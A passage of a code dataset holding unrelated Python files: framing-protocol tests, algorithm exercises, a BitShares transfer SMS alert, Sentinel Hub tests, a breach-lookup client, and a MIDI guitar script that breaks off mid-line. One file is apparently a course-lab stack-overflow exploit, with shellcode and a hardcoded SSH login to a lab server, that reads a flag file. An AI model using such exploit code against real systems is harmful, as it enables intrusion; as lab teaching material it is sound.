= BitArray('0x00, 0x01, 0x02, 0xFF, 0x7E, 0x7D, 0x00, 0x00, 0x7D, 0xFD, 0x7E')\n test2 = BitArray('0x02, 0x00, 0x01, 0x02, 0x7D, 0x00')\n\n print('test 1:', end=' ')\n for byte in as_bytes(test1.hex):\n print(byte, end=' ')\n print()\n print('test 2:', end=' ')\n for byte in as_bytes(test2.hex):\n print(byte, end=' ')\n print()\n\n print()\n\n print('HDLC:')\n print('test 1:', end=' ')\n for i, b in enumerate(HDLC(test1).bin, 1):\n print(b, end='')\n if i % 8 == 0:\n print('', end=' ')\n print()\n print('test 2:', end=' ')\n for i, b in enumerate(HDLC(test2).bin, 1):\n print(b, end='')\n if i % 8 == 0:\n print('', end=' ')\n\n print()\n\n print('PPP:')\n print('test 1:', end=' ')\n for byte in as_bytes(PPP(test1).hex):\n print(byte, end=' ')\n print()\n print('test 2:', end=' ')\n for byte in as_bytes(PPP(test2).hex):\n print(byte, end=' ')\n print()\n\n print()\n\n print('COBS:')\n print('test 1:', end=' ')\n for byte in as_bytes(COBS(test1).hex):\n print(byte, end=' ')\n print()\n print('test 2:', end=' ')\n for byte in as_bytes(COBS(test2).hex):\n print(byte, end=' ')\n print()\n","sub_path":"hw8/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"247001419","text":"def min_dist(D1: [float], D2: [float]) -> float:\n \"\"\"\n Time complexity: O(NlogM)\n \"\"\"\n if D1 == None or D2 == None or len(D1) == 0 or len(D2) == 0:\n return 0\n if len(D1) < len(D2):\n temp = D1\n D1 = D2\n D2 = temp\n\n D2 = sorted(D2)\n res = float('inf')\n for x in D1:\n start, end = 0, len(D2) - 1\n while start < end:\n mid = int(start + (end - start) / 2)\n if D2[mid] < x:\n start = mid + 1\n else:\n end = mid\n dist = abs(D2[start] - x) if start < len(D2) else float('inf')\n dist = min(dist, abs(D2[start - 1] - x)) if start > 0 else dist\n res = min(res, dist)\n return res\n\nif __name__ == '__main__':\n assert min_dist([1, 2, 3, 4], [1, 2, 3, 4]) 
== 0\n assert min_dist([1, 3, 5, 7, 9], [2, 6, 8]) == 1\n assert min_dist([5, 1.2, 8], [-3, 2, 6]) == 0.8\n assert min_dist([5, 1, 8.7], [-3, 2, 6]) == 1\n assert min_dist([5, -1.2, 8], [float('inf')]) == float('inf')\n assert min_dist([5, -1.2, 8], [-float('inf')]) == float('inf')\n assert min_dist([-float('inf')], [-float('inf')]) == float('inf')\n\n","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596211870","text":"from pprint import pprint\nfrom bitshares.account import Account\nfrom bitshares.blockchain import Blockchain\nfrom bitshares.asset import Asset\nfrom bitshares import BitShares\nfrom twilio.rest import Client\n\n# User Inputs\nACCOUNT_WATCHING = ''\nBOT_PHONE_NUMBER = ''\nYOUR_PHONE_NUMBER = ''\n\naccount_sid = ''\nauth_token = ''\nclient = Client(account_sid, auth_token)\n\nbitshares = BitShares(\n node=[\n \"wss://na.openledger.info/ws\",\n \"wss://kc-us-dex.xeldal.com/ws\"\n ]\n )\n\nblockchain = Blockchain(\n blockchain_instance=bitshares,\n mode='head'\n)\n\nfor op in blockchain.stream(['transfer']):\n payee = Account(op['to']).name\n if payee == ACCOUNT_WATCHING:\n from_account = Account(op['from']).name\n asset_symbol = Asset(op['amount']['asset_id']).symbol\n asset_precision = int(Asset(op['amount']['asset_id']).precision)\n amount = int(op['amount']['amount']) / (10**asset_precision)\n Asset.clear_cache()\n body = '{} sent {} {} {} in block {}.'.format(\n from_account,\n payee,\n amount,\n asset_symbol,\n op['block_num']\n )\n message = client.messages.create(\n body=body,\n from_=BOT_PHONE_NUMBER,\n to=YOUR_PHONE_NUMBER\n )\n pprint(message.sid) \n Account.clear_cache()\n","sub_path":"bitshares_transfer_text.py","file_name":"bitshares_transfer_text.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"213722198","text":"def next(n):\n if n % 2 == 0:\n return n // 2\n else:\n return 3 * n + 1\n\ndef length(x):\n global history\n k = 1\n aux = x\n while aux != 1:\n aux = next(aux)\n if aux in history:\n k += history[aux]\n break\n k += 1\n history[x] = k\n return k\n\nn = -1\nmaxl = -1\nhistory = {}\nfor i in range(1, 1000000):\n l = length(i)\n if l > maxl:\n n = i\n maxl = l\nprint(n)\n","sub_path":"problem 014/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153219022","text":"#!/usr/bin/env python2\n\nfrom pwn import *\n\ncontext.terminal = ['tmux', 'splitw', '-v']\ncontext.update(arch='i386', os='linux')\n\nlocal_dbg = 0xffffcd50\nlocal = local_dbg+0x100\n\nserver_dbg = 0xffffd550\nserver = server_dbg+0x100\n\nstart_addr = server_dbg\n\nshellcode = shellcraft.cat(\"/proc/flag\")\npayload = cyclic(cyclic_find(0x61616167))\nfor i in range (0, 1):\n payload += p32(server)\npayload += \"\\x90\"*2000\npayload += asm(shellcode)\nfor i in range (0, 200):\n payload += p32(server)\n\n# connect to our server\ns = ssh(\"lab03\", \"52.201.10.159\", password=\"b50e289f\")# invoke a process in the server\np = s.process(\"./crackme0x00\", cwd=\"/home/lab03/tut03-pwntool\")\n\n# Local\n#p = process(\"./crackme0x00\", cwd=\"/home/jakeholl/git/cs6265/lab03/tut03-pwntool\")\n\n# Local debug\n#p = gdb.debug(\"./crackme0x00\", ''' continue 
''')\n\np.sendline(payload)\np.interactive()\n","sub_path":"cs6265/lab03/tut03-pwntool/exploit4.py","file_name":"exploit4.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"354516109","text":"\"\"\"\nA module that tests an interface for Sentinel Hub Batch processing\n\"\"\"\nimport datetime as dt\nimport itertools as it\n\nfrom sentinelhub import SentinelHubBatch, SentinelHubRequest, DataCollection, BBox, CRS, MimeType\n\n\ndef test_iter_tiling_grids(config):\n tiling_grids = list(SentinelHubBatch.iter_tiling_grids(config=config))\n\n assert len(tiling_grids) >= 1\n assert all(isinstance(item, dict) for item in tiling_grids)\n\n\ndef test_single_tiling_grid(config):\n tiling_grid = SentinelHubBatch.get_tiling_grid(0, config=config)\n\n assert isinstance(tiling_grid, dict)\n\n\ndef test_create_and_run_batch_request(config, requests_mock):\n \"\"\" A test that mocks creation and execution of a new batch request\n \"\"\"\n evalscript = 'some evalscript'\n time_interval = dt.date(year=2020, month=6, day=1), dt.date(year=2020, month=6, day=10)\n bbox = BBox([14.0, 45.8, 14.2, 46.0], crs=CRS.WGS84)\n sentinelhub_request = SentinelHubRequest(\n evalscript=evalscript,\n input_data=[\n SentinelHubRequest.input_data(\n data_collection=DataCollection.SENTINEL2_L1C,\n time_interval=time_interval,\n )\n ],\n responses=[\n SentinelHubRequest.output_response('B02', MimeType.TIFF),\n ],\n bbox=bbox,\n config=config\n )\n\n requests_mock.post('/oauth/token', real_http=True)\n request_id = 'mocked-id'\n requests_mock.post('/api/v1/batch/process', [{\n 'json': {\n 'id': request_id,\n 'processRequest': {\n 'input': {\n 'bounds': {\n 'bbox': list(bbox),\n 'properties': {\n 'crs': 'http://www.opengis.net/def/crs/OGC/1.3/CRS84'\n }\n }\n }\n }\n }\n }])\n\n batch_request = SentinelHubBatch.create(\n sentinelhub_request,\n tiling_grid=SentinelHubBatch.tiling_grid(\n grid_id=1000,\n resolution=10,\n buffer=(50, 50)\n ),\n bucket_name='test',\n description='Test batch job',\n config=config\n )\n\n assert isinstance(batch_request, SentinelHubBatch)\n assert batch_request.request_id == request_id\n assert batch_request.info['id'] == request_id\n assert request_id in repr(batch_request)\n assert batch_request.bbox == bbox\n\n delete_endpoint = f'/api/v1/batch/process/{request_id}'\n requests_mock.delete(delete_endpoint, [{'json': ''}])\n\n batch_request.delete()\n requests_mock.request_history[-1].url.endswith(delete_endpoint)\n\n endpoints = ['analyse', 'start', 'cancel', 'restartpartial']\n full_endpoints = [f'/api/v1/batch/process/{request_id}/{endpoint}' for endpoint in endpoints]\n for full_endpoint in full_endpoints:\n requests_mock.post(full_endpoint, [{'json': ''}])\n\n batch_request.start_analysis()\n batch_request.start_job()\n batch_request.cancel_job()\n batch_request.restart_job()\n\n for index, full_endpoint in enumerate(full_endpoints):\n assert requests_mock.request_history[index - len(full_endpoints)].url.endswith(full_endpoint)\n\n\ndef test_iter_requests(config):\n batch_requests = list(it.islice(SentinelHubBatch.iter_requests(config=config), 10))\n assert all(isinstance(request, SentinelHubBatch) for request in batch_requests)\n\n if batch_requests:\n latest_request = SentinelHubBatch.get_latest_request(config=config)\n assert isinstance(latest_request, SentinelHubBatch)\n assert all(latest_request.info['created'] >= request.info['created'] for request in 
batch_requests)\n","sub_path":"tests/test_sentinelhub_batch.py","file_name":"test_sentinelhub_batch.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"31625449","text":"from traffgroup.core.X import XEnum\n\nDEFAULT_DOMAIN = 'traffgroup.com'\n\nclass CReservedSites(XEnum):\n '''Technology site IDs reserved for internal usage (i.e. justice, juidgement, apocalypse, collapsing)'''\n def __init__(self):\n XEnum.__init__(self)\n self.ACCOUNTS = 1\n self.BILLING = 2\n self.PARTNERSHIP = 3\n self.SUPPORT = 4\n self.TRAC = 5\n self.STATIC = [6, 7]\n self.CORE = 8\n self.CONTENT = [6, 7]\n self.XSTATIC = 9\n self.DEFAULT_PAYSITE = 52\n self.RESERVED9 = 10\n\n_X__ReservedSites = CReservedSites()\n\n\nclass _AccountsExternalGlobals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.ROOT = \"http://acc.traffgroup.com/\"\n self.BASE = \"http://acc.traffgroup.com/external\"\n self.LOGIN = lambda method : self.BASE + \"/login/\" + method\n self.LOGOUT = self.BASE + \"/logout\"\n self.REGISTER = self.BASE + \"/register\"\n self.RECOVER = lambda method : self.BASE + \"/recover/\" + method\n self.VERIFY = lambda method : self.BASE + \"/verify/\" + method\n\n\nclass _AccountsGlobals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.BASE = \"http://acc.traffgroup.com\"\n self.LOGINFORM = self.BASE + \"/login/loginform\"\n self.LOGIN = self.BASE + \"/login/login\"\n self.LOGOUT = self.BASE + \"/login/logout\"\n self.REGISTRATION = self.BASE + \"/registration/regform\"\n self.EXTERNAL = _AccountsExternalGlobals()\n self.CAPTCHA = self.BASE + \"/captcha\"\n self.HOST = 'acc.traffgroup.com'\n\n\nclass _Billing_Globals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.URI = \"http://newbill.\"\n self.HOST = \"http://newbill.traffgroup.com\"\n self.CHECKOUT = self.URI + \"checkout/index/\"\n self.CHECKOUT_FRAME = self.URI + \"checkout/frame/\"\n# self.SUBSCRIPTION = lambda x: 'http://127.0.0.1:8087'\n self.SUBSCRIPTION = lambda domain: (self.URI + domain) \\\n if not domain.startswith('127.0.0.1') else self.URI + DEFAULT_DOMAIN\n \nclass _StaticGlobals(XEnum):\n def __init__(self, id, domain, site_id):\n XEnum.__init__(self)\n self.BASE = \"http://\" + domain #\"http://static\" + ((\"%.2d\" % id) if id is not None else \"\") + \".\" + domain\n self.SITE_ID = site_id\n self.PROMO = self.BASE + \"/promo\"\n self.JS = self.BASE + \"/static/js\"\n self.CSS = self.BASE + \"/css\"\n self.IMG = self.BASE + \"/img\"\n self.SWF = self.BASE + \"/swf\"\n self.BIN = self.BASE + \"/bin\"\n self.TEMPLATES = self.BASE + \"/templates\"\n self.PROFILES = self.BASE + \"/profiles/social\"\n self.THEMES = self.BASE + \"/css/themes\"\n self.SITE = lambda x: self.BASE + \"/site/\" + (\"%.2d\" % x)\n\n self.CONTENT_BASE = \"http://static\" + ((\"%.2d\" % id) if id is not None else \"\") + \".\" + domain\n self.CONTENT = self.CONTENT_BASE + \"/content\"\n self.CONTENT_PROTECTED = self.CONTENT_BASE + \"/protected\"\n self.CONTENT_MEMBER = self.CONTENT_BASE + \"/members\"\n self.CONTENT_THUMBS = self.CONTENT_BASE + \"/thumbs\"\n\nclass CSiteGlobals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.ACCOUNTS = _AccountsGlobals()\n self.STATIC = [_StaticGlobals(x + 1, \"static.traffgroup.com\",\n _X__ReservedSites.STATIC[x]) for x in range(len(_X__ReservedSites.STATIC))] + \\\n [_StaticGlobals(1, \"127.0.0.1\", 11)]\n self.XSTATIC = _StaticGlobals(None, \"xbasis.org\", _X__ReservedSites.XSTATIC)\n 
self.CONTENT = dict([(s.SITE_ID, s) for s in self.STATIC])\n self.BILLING = _Billing_Globals()\n self.WIKI = \"http://wiki.xbasis.org/awmpartners\"\n self.SALT = u'cM?%tgfK9.je'\n","sub_path":"traffgroup/core/model/siteglobals.py","file_name":"siteglobals.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"77379000","text":"import requests\n\n\n\nURL = \"https://haveibeenpwned.com/api/v3/breaches?domain=linkedin.com\"\n\n# parses the list of breaches\ndef parse_breaches(breaches):\n\tfor breach in breaches:\n\t\tprint(f'Breached domain: {breach[\"Domain\"]} on {breach[\"BreachDate\"]}')\n\t\tprint(\"The following information was stolen: \")\n\t\tfor info in breach[\"DataClasses\"]:\n\t\t\tprint(f\"\\t- {info}\")\n\ndef main():\n\tresponse = requests.get(URL)\n\tparse_breaches(response.json())\n\t\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Python/REST/rest_client.py","file_name":"rest_client.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"595081355","text":"import pickle\nfrom itertools import product\nfrom collections import defaultdict\nstopwords = {\"अंदर\", \"अत\", \"अदि\", \"अप\", \"अपना\", \"अपनि\", \"अपनी\", \"अपने\", \"अभि\", \"अभी\", \"आदि\", \"आप\", \"इंहिं\", \"इंहें\", \"इंहों\", \"इतयादि\", \"इत्यादि\", \"इन\", \"इनका\", \"इन्हीं\", \"इन्हें\", \"इन्हों\", \"इस\", \"इसका\", \"इसकि\", \"इसकी\", \"इसके\", \"इसमें\", \"इसि\", \"इसी\", \"इसे\", \"उंहिं\", \"उंहें\", \"उंहों\", \"उन\", \"उनका\", \"उनकि\", \"उनकी\", \"उनके\", \"उनको\", \"उन्हीं\", \"उन्हें\", \"उन्हों\", \"उस\", \"उसके\", \"उसि\", \"उसी\", \"उसे\", \"एक\", \"एवं\", \"एस\", \"एसे\", \"ऐसे\", \"ओर\", \"और\", \"कइ\", \"कई\", \"कर\", \"करता\", \"करते\", \"करना\", \"करने\", \"करें\", \"कहते\", \"कहा\", \"का\", \"काफि\", \"काफ़ी\", \"कि\", \"किंहें\", \"किंहों\", \"कितना\", \"किन्हें\", \"किन्हों\", \"किया\", \"किर\", \"किस\", \"किसि\", \"किसी\", \"किसे\", \"की\", \"कुछ\", \"कुल\", \"के\", \"को\", \"कोइ\", \"कोई\", \"कोन\", \"कोनसा\", \"कौन\", \"कौनसा\", \"गया\", \"घर\", \"जब\", \"जहाँ\", \"जहां\", \"जा\", \"जिंहें\", \"जिंहों\", \"जितना\", \"जिधर\", \"जिन\", \"जिन्हें\", \"जिन्हों\", \"जिस\", \"जिसे\", \"जीधर\", \"जेसा\", \"जेसे\",\n \"जैसा\", \"जैसे\", \"जो\", \"तक\", \"तब\", \"तरह\", \"तिंहें\", \"तिंहों\", \"तिन\", \"तिन्हें\", \"तिन्हों\", \"तिस\", \"तिसे\", \"तो\", \"था\", \"थि\", \"थी\", \"थे\", \"दबारा\", \"दवारा\", \"दिया\", \"दुसरा\", \"दुसरे\", \"दूसरे\", \"दो\", \"द्वारा\", \"न\", \"नहिं\", \"नहीं\", \"ना\", \"निचे\", \"निहायत\", \"नीचे\", \"ने\", \"पर\", \"पहले\", \"पुरा\", \"पूरा\", \"पे\", \"फिर\", \"बनि\", \"बनी\", \"बहि\", \"बही\", \"बहुत\", \"बाद\", \"बाला\", \"बिलकुल\", \"भि\", \"भितर\", \"भी\", \"भीतर\", \"मगर\", \"मानो\", \"मे\", \"में\", \"यदि\", \"यह\", \"यहाँ\", \"यहां\", \"यहि\", \"यही\", \"या\", \"यिह\", \"ये\", \"रखें\", \"रवासा\", \"रहा\", \"रहे\", \"ऱ्वासा\", \"लिए\", \"लिये\", \"लेकिन\", \"व\", \"वगेरह\", \"वरग\", \"वर्ग\", \"वह\", \"वहाँ\", \"वहां\", \"वहिं\", \"वहीं\", \"वाले\", \"वुह\", \"वे\", \"वग़ैरह\", \"संग\", \"सकता\", \"सकते\", \"सबसे\", \"सभि\", \"सभी\", \"साथ\", \"साबुत\", \"साभ\", \"सारा\", \"से\", \"सो\", \"हि\", \"ही\", \"हुअ\", \"हुआ\", \"हुइ\", \"हुई\", \"हुए\", \"हे\", \"हें\", \"है\", \"हैं\", \"हो\", \"होता\", \"होति\", \"होती\", \"होते\", \"होना\", \"होने\"}\nhindi_doc = open('input.txt', 'r').readlines()\nsentences = []\n\n\ndef get_rhyme_score(pair):\n word1 = 
pair[0]\n word2 = pair[1]\n i = len(word1)-1\n j = len(word2)-1\n count = 0\n while(word1[i] == word2[j] and i >= 0 and j >= 0):\n i -= 1\n j -= 1\n count += 1\n return count\n\n\ndef get_synonyms(word):\n word2Synset = pickle.load(\n open(\"python-hindi-wordnet/hindi_wordnet_python/WordSynsetDict.pk\", 'rb'))\n synonyms = pickle.load(\n open(\"python-hindi-wordnet/hindi_wordnet_python/SynsetWords.pk\", 'rb'))\n # word = word.decode('utf-8', 'ignore')\n if word in word2Synset:\n synsets = word2Synset[word]\n for pos in synsets.keys():\n for synset in synsets[pos]:\n if synset in synonyms:\n return synonyms[synset]['1']\n\n\nif __name__ == \"__main__\":\n synlists = []\n for sentence in hindi_doc:\n sentlist = []\n sentences.append(sentence.strip().split(' '))\n for words in sentence.strip().split(' '):\n if words not in stopwords:\n synwords = get_synonyms(words)\n if synwords is None:\n sentlist.append([words])\n else:\n sentlist.append(synwords)\n\n else:\n sentlist.append(None)\n synlists.append(sentlist)\n print(synlists)\n rhyming_score = defaultdict(int)\n rhyming_words = defaultdict()\n print(len(synlists[0]))\n print(len(synlists[1]))\n for i in range(len(synlists[0])):\n if synlists[0][i] is None:\n continue\n print(synlists[0][i])\n for j in range(len(synlists[1])):\n if synlists[1][j] is None:\n continue\n print(synlists[1][j])\n cart_p = product(synlists[0][i], synlists[1][j])\n for tpl in cart_p:\n score = get_rhyme_score(tpl)\n if score > rhyming_score[(i, j)]:\n rhyming_score[(i, j)] = score\n rhyming_words[(i, j)] = tpl\n print(rhyming_words)\n keymax = max(rhyming_words, key=rhyming_score.get)\n sentences[0][keymax[0]] = rhyming_words[keymax][0]\n sentences[1][keymax[1]] = rhyming_words[keymax][1]\n print(sentences)\n","sub_path":"Honours/parse_sentence.py","file_name":"parse_sentence.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"547188161","text":"def process_sample(file):\n lines = file.readlines()\n lines = [x.strip() for x in lines]\n return lines\n\ndef get_common_lines(lines):\n for first in lines:\n for second in lines:\n if first != second:\n\n diff_count = 0\n for letter_a, letter_b in zip(first, second):\n if letter_a != letter_b:\n diff_count += 1\n\n if diff_count <= 1:\n return ''.join([x for x in first if x in first and x in second])\n\n return \"\"\n\nsample = open(\"02-sample.txt\", \"r\")\nlines = process_sample(sample)\nprint(get_common_lines(lines))\n","sub_path":"02b.py","file_name":"02b.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"565300480","text":"import pandas as pd\r\nimport os\r\n#import difflib\r\n\r\ndirectory = r'C:\\Users\\aarus\\Documents\\STEM2SHTEM\\canonical25mers'\r\nref_directory = r'C:\\Users\\aarus\\Documents\\STEM2SHTEM\\canonical25mers\\EPI_ISL_402124.fa'\r\nfasta_directory = r'C:\\Users\\aarus\\Documents\\STEM2SHTEM\\fasta_files'\r\n\r\nwith open(ref_directory, \"r\") as ref_file:\r\n ref_distinct = len(list(ref_file)[::2])\r\n\r\nfor filename in os.listdir(directory):\r\n if (filename == \"EPI_ISL_402124.fa\"):\r\n continue\r\n else:\r\n print(filename)\r\n with open(os.path.join(directory, filename), \"r\") as n_file:\r\n num_distinct = len(list(n_file)[::2])\r\n print(num_distinct-ref_distinct)\r\n\r\n\r\n#df = pd.DataFrame(data = [countries, states, dates], columns=[\"Countries\", \"Region/State/Province\", \"Date 
Reported\"])\r\n#df.to_csv(\"kmer_differences.csv\")\r\n\r\n\r\n\r\n","sub_path":"CountandDistances/distinct_k-mer_differences.py","file_name":"distinct_k-mer_differences.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"195717372","text":"import re\n\nfrom models.tag import Tag\nfrom models.word import Word\n\n\ndef word_list(text):\n ignored = {\"the\", \"and\", \"but\", \"its\", \"than\", \"was\", \"their\"}\n wlist = re.findall(r\"\\b[a-z]{3,30}\\b\", text.lower())\n wlist = [w for w in wlist if w not in ignored]\n return wlist\n\n\ndef tag_info(user_qa, normalize=True):\n tags = dict()\n total_rep = 0\n for qa in user_qa:\n for t in qa[0][\"tags\"]:\n info = tags.get(t, Tag(t))\n info.count += 1\n rep = qa[1][\"score\"] * 10 + (qa[1][\"is_accepted\"] and 15 or 0)\n info.reputation += rep\n total_rep += rep\n tags[t] = info\n if normalize:\n for k in tags:\n tags[k].reputation /= total_rep\n return tags\n\n\ndef word_info(questions, normalize=True):\n words = dict()\n total_f = 0\n for q in questions:\n wlist = word_list(q[\"body\"])\n for w in wlist:\n word = words.get(w, Word(w, 0, set()))\n word.tags |= set(q[\"tags\"])\n word.frequency += 1\n words[w] = word\n total_f += 1\n if normalize:\n for k in words:\n words[k].frequency /= total_f\n return words\n\n\ndef word_expected_reputation(w, word_info, tag_info):\n word = word_info.get(w, Word(w, 1, set()))\n w_freq = word.frequency\n w_tag_factor = sum(tag_info[x].ratio() for x in word.tags)\n w_factor = w_freq * w_tag_factor\n return w_factor\n\n\ndef question_expected_reputation(question, word_info, tag_info):\n wlist = word_list(question[\"body\"])\n rep = sum(tag_info[x].ratio() for x in question[\"tags\"] if x in tag_info)\n for w in wlist:\n rep += word_expected_reputation(w, word_info, tag_info)\n return rep\n","sub_path":"tools/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7954899","text":"#Author: Isaac Morales\n# This is a prettier version of my original code for playing the guitar using\n#the raspberry pi.\n#!/usr/bin/env python\n\nimport array as ar\nimport time\nimport mido\nfrom mido import MidiFile\nfrom ComboClass import guitar\n\ndef menu():\n print('Welcome! please select where to start')\n print('1. Start from MIDI file ')\n print('2. 
Start from text file')\n choice = input(':)\\n')\n return int(choice)\n\n #This function turns the MIDI file into a text file\ndef MIDItoTxt(fname):\n paper = open(fname + \".txt\", \"w+\")\n for message in MidiFile(fname +'.mid').play():\n # time.sleep(message.time)\n if not message.is_meta:\n oof = str(message)\n paper.write(oof + '\\n')\n else:\n continue\n paper.close()\n return True\n\n#Read new text file\ndef ReadIt(fname):\n paper = open(fname + '.txt',)\n term0 = 'note_on'\n term1 = 'note_off'\n term2 = 'note='\n term3 = 'time='\n noteStatus = []\n note = []\n timeDelay = []\n if paper.mode == 'r':\n message = paper.read()\n words = message.split()\n for i in words:\n if term0 in i: #note_on\n noteStatus.append(i)\n elif term1 in i: #note_off\n noteStatus.append(i)\n elif term2 in i: #note=\n note.append(i)\n elif term3 in i: #time=\n timeDelay.append(i)\n else:\n continue\n noteCount = len(note)\n timeCount = len(timeDelay)\n if timeCount > noteCount:\n del timeDelay[timeCount-1]\n else:\n continue\n paper.close()\n # combine both arrays for the Midi values when on\n MidiNotes = []\n count = 0\n # print(len(timeDelay)) #number of time delays\n # print(len(note)) #number of notes\n for j in range(len(timeDelay)):\n print( noteStatus[j],timeDelay[j])\n\n sel = input('on or off? \\n')\n\n for i in range(len(timeDelay)):\n if sel == 'on':\n if term0 in noteStatus[i]:\n temp = note[i].split(term2,2)[1]\n temp2 = timeDelay[i].split(term3,2)[1]\n MidiNotes.append([int(temp),float(temp2)]) #We kinda snapped with this sis\n count +=1\n else:\n continue\n elif sel == 'off':\n if term1 in noteStatus[i]:\n temp = note[i].split(term2,2)[1]\n temp2 = timeDelay[i].split(term3,2)[1]\n MidiNotes.append([int(temp),float(temp2)]) #We kinda snapped with this sis\n count +=1\n else:\n continue\n\n # print(count)\n print('Midi notes and their time delays for this song no modifications:\\n',MidiNotes)\n return MidiNotes\n\ndef Open(MidiNotes,notePos,strings):\n StringE4 = []\n StringB3 = []\n StringG3 = []\n StringD2 = []\n StringA2 = []\n StringE2 = []\n for i in range(len(MidiNotes)):\n if MidiNotes[i][0] <=71 and MidiNotes[i][0] >= 66: #E4\n # index, note, string as string, finger flag, string as number, time delay of note\n StringE4.append([i,MidiNotes[i][0],'StringE4',0,0,MidiNotes[i][1]])\n MidiNotes[i][0] = 64\n # StringE4.append(64)\n elif MidiNotes[i][0] <= 65 and MidiNotes[i][0] >= 60: #B3\n StringB3.append([i,MidiNotes[i][0],'StringB3',0,1,MidiNotes[i][1]])\n MidiNotes[i][0] = 59\n # StringB3.append(59)\n elif MidiNotes[i][0] <= 59 and MidiNotes[i][0] >= 55: #G3\n StringG3.append([i,MidiNotes[i][0],'StringG3',0,2,MidiNotes[i][1]])\n MidiNotes[i][0] = 55\n # StringG3.append(55)\n elif MidiNotes[i][0] <= 54 and MidiNotes[i][0] >= 50: #D2\n StringD2.append([i,MidiNotes[i][0],'StringD2',0,3,MidiNotes[i][1]])\n MidiNotes[i][0] = 50\n # StringD2.append(50)\n elif MidiNotes[i][0] <= 49 and MidiNotes[i][0] >=45: #A2\n StringA2.append([i,MidiNotes[i][0],'StringA2',0,4,MidiNotes[i][1]])\n MidiNotes[i][0] =45\n # StringA2.append(45)\n elif MidiNotes[i][0] <=44 and MidiNotes[i][0] >=40: #E2\n StringE2.append([i,MidiNotes[i][0],'StringE2',0,5,MidiNotes[i][1]]) #index,note,string, flag\n MidiNotes[i][0] = 40\n # StringE2.append(40)\n else:\n continue\n # print(MidiNotes)\n strings.append(StringE4) #string 0\n strings.append(StringB3) #string 1\n strings.append(StringG3) #string 2\n strings.append(StringD2) #string 3\n strings.append(StringA2) #string 4\n strings.append(StringE2) #string 5\n # print('all 6 
strings and the list of notes on each one ft. their index: \\n',strings)\n print('-----------------------------------------')\n print('String 0 ranged 66 to 71: \\n ',StringE4)\n print('-----------------------------------------')\n print('String 1 ranged 60 to 65: \\n ',StringB3)\n print('-----------------------------------------')\n print('String 2 ranged 55 to 59: \\n ',StringG3)\n print('-----------------------------------------')\n print('String 3 ranged 50 to 54: \\n ',StringD2)\n print('-----------------------------------------')\n print('String 4 ranged 45 to 49: \\n ',StringA2)\n print('-----------------------------------------')\n print('String 5 ranged 40 to 44: \\n ',StringE2)\n print('-----------------------------------------')\n # print(strings[0][0][0]) #[open string][index of info in list][member of 2D info] //0 = index , 1 = Note\n # print(len(strings[1]))\n # print(strings[2][1][2])\n return (MidiNotes,strings)\n\ndef Dictionary(notePos):\n #Dictionary full of steps and notes\n fname1 ='noteSteps'\n paper = open(fname1 + '.txt','r')\n if paper.mode == 'r':\n Notes = paper.readlines()\n Notes = [i.split('\\n',2)[0]for i in Notes]\n NoteVals = [i.split('\\t',2)[0]for i in Notes]\n StepPos = [i.split('\\t',2)[1]for i in Notes]\n for x,y in zip(NoteVals, StepPos):\n notePos[x] = y\n # for x,y in notePos.items():\n # print(x,y)\n\n paper.close()\n return notePos\n\ndef Preview(MidiNotes,strings,notePos,pls):\n OpenStrings = [[0,'E4',1,64],[1,'B3',2,59],[2,'G3',3,55],[3,'D2',4,50],[4,'A2',5,45],[5,'E2',6,40]]\n pluck = ar.array('B',(False for v in range(0,len(OpenStrings)))) #since the picks are backwards now this may flop but idk\n if pls < len(MidiNotes):\n i = pls\n for i in range(len(MidiNotes)): #for evey note in the song\n for string in range(len(strings)): #on ever string\n stringLen = len(strings[string])\n for n in range(stringLen): #for every note on that string\n if strings[string][n][0] == i: #index of the notes have been spread thru out strings\n if n>0: #not the first note on the string\n print('--------------------------------------------------------------------------')\n print(i,' note: ',strings[string][n][1] )\n print('index of previous note on this string: ',strings[string][n-1][0])\n # print('steps from the end: ',notePos[str(strings[string][n-1][1])])\n print('index of current note on this string: ',strings[string][n][0])\n # print('steps from the end: ',notePos[str(strings[string][n][1])])\n difference = int(strings[string][n-1][1])- int(strings[string][n][1]) #distance b/w curent note on string and prev note on string\n direction = 2 if difference > 0 else 1 #if pos: move fwd, neg: back\n difference = abs(difference)\n\n strings[string][n][3] = 1 #flag indicating current pos of finger\n\n for b in range(len(strings)): #check each string\n changeLen = len(strings[b])\n for note in range(changeLen): #check every note that is on that string\n if int(strings[b][note][3]) == 1 and b < string: #explain this sis... 
